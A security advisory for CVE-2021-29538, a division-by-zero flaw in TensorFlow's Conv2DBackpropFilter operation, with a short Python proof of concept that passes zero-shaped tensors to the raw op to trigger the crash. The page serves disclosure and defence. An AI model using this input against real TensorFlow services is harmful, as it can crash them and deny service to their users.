CVE-2021-29538: Division by zero in `Conv2DBackpropFilter`

(updated )

An attacker can cause a division by zero to occur in Conv2DBackpropFilter:

import tensorflow as tf

input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)

tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 1, 1, 1],
use_cudnn_on_gpu=False,
padding='SAME',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
)

References

Detect and mitigate CVE-2021-29538 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →